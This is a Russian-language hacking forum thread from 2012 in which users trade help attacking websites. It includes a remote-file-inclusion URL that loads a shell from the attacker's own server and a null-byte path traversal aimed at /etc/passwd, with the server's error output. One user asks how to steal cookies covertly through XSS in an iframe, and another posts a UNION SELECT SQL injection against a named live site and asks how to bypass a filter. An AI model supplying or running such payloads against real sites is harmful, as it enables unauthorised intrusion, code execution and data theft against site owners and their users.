HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.08.2012, 13:05
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

blesse, if allow_url_fopen != Off:

http://site.ru/dir/index.php?print&id=http://mysite.com/shell
 
Ответить с цитированием

  #2  
Старый 28.08.2012, 19:25
blesse
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
Провел на форуме:
29647

Репутация: 1
По умолчанию

Цитата:
Сообщение от Skofield  
blesse
, if
allow_url_fopen
!= Off:
http://site.ru/dir/index.php?print&id=http://mysite.com/shell
вы думаете ,что я настолько глуп?

я же говорю

изменяю '669' вылазит уже mysql ошибка ,а мне нужен очень инклуд.

Может ошибка гдето в скпите и вообще нету инклуда тут?
 
Ответить с цитированием

  #3  
Старый 29.08.2012, 02:10
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

2 o3,14um:

mysql hex -> unhex ( unhex(hexedstr) ), через php проходит в хексе, в мускуле как мы знаем преобразовывается, следовательно префикс должен порйти через фильтры в php. а -ля: +WHERE+table_name=0x707265665F7461626C(pref_tabl)

2 blesse:

Четко и ясно написано в error: INCLUDE. Из базы берется согласно идентификатору имя файла и инклудится. Теоретически, сформировав корректный mysql inject запрос, в поле вывода, которое подставляется в качестве аргумента в include, можно реализовать задуманное. Но во первых, поле может некорректно формироваться в следствие некоторых факторов при mysql-inj, к тому же эксепшены и тп могут явно подавлять последующий инклуд при некорректном mysql запросе и тп. Может быть такое что скуля сформирована, параметр в инклуд передается, но визуально это явно не отображается.
 
Ответить с цитированием

  #4  
Старый 29.08.2012, 02:28
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Cennarios

2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет
 
Ответить с цитированием

  #5  
Старый 29.08.2012, 03:30
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

Цитата:
Сообщение от Konqi  
Cennarios
2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет
Да, на самом деле. Не думаю что фильтр настолько туп ,чтобы вида (символ)pref_ пропускал ) Моя невнимательность.
 
Ответить с цитированием

  #6  
Старый 29.08.2012, 12:13
blesse
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
Провел на форуме:
29647

Репутация: 1
По умолчанию

Нешел другой инклуд:

http://site/patch/index.php?X=G&F=blalalal

Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37

Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37

Fatal error: require() [function.require]: Failed opening required 'namesutf8-blalalal' (include_path='.:') in /x/x/x/x/x/x/index.php on line 37

как я понимаю тоже бесполезный?

при изменеии переменной в ошибке оставется часть namesutf8-

Т.Е. при http://site/patch/index.php?X=G&F=../../../../../../../../etc/passwd%00

вылазит:

Warning: require(namesutf8-../../../../../../../../etc/passwd)
 
Ответить с цитированием

  #7  
Старый 29.08.2012, 16:30
Manok
Новичок
Регистрация: 27.06.2010
Сообщений: 15
Провел на форуме:
3822

Репутация: 0
По умолчанию

Античат, помоги.

Есть некая страница.

page.php?text=Тест

этот text параметр выводится на странице. XSS работает, пробовал alert.

Фильтрации нет вообще видимо.

Можно ли как то вставить туда php код?
 
Ответить с цитированием

  #8  
Старый 29.08.2012, 16:33
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
Провел на форуме:
178623

Репутация: 94


По умолчанию

Цитата:
Сообщение от Manok  
Античат, помоги.
Есть некая страница.
page.php?text=Тест
этот text параметр выводится на странице. XSS работает, пробовал alert.
Фильтрации нет вообще видимо.
Можно ли как то вставить туда php код?
Нет.
 
Ответить с цитированием

  #9  
Старый 29.08.2012, 16:34
Manok
Новичок
Регистрация: 27.06.2010
Сообщений: 15
Провел на форуме:
3822

Репутация: 0
По умолчанию

Жаль. А что можно с этого полезного поиметь? Страница общедоступна.

Можно ли как то скрыто стянуть куки, если разместить этот юрл в айфрейме, например?
 
Ответить с цитированием

  #10  
Старый 29.08.2012, 17:57
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
Провел на форуме:
45774

Репутация: 26
По умолчанию

http://www.dialogas.com/senoji/index.php?lng=lt&content=pages&page_id=-52+union+select+table_name+from+information_schema .tables+--+

не сталкивался раньше с таким, фильтруется from, можно как-то обойти?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.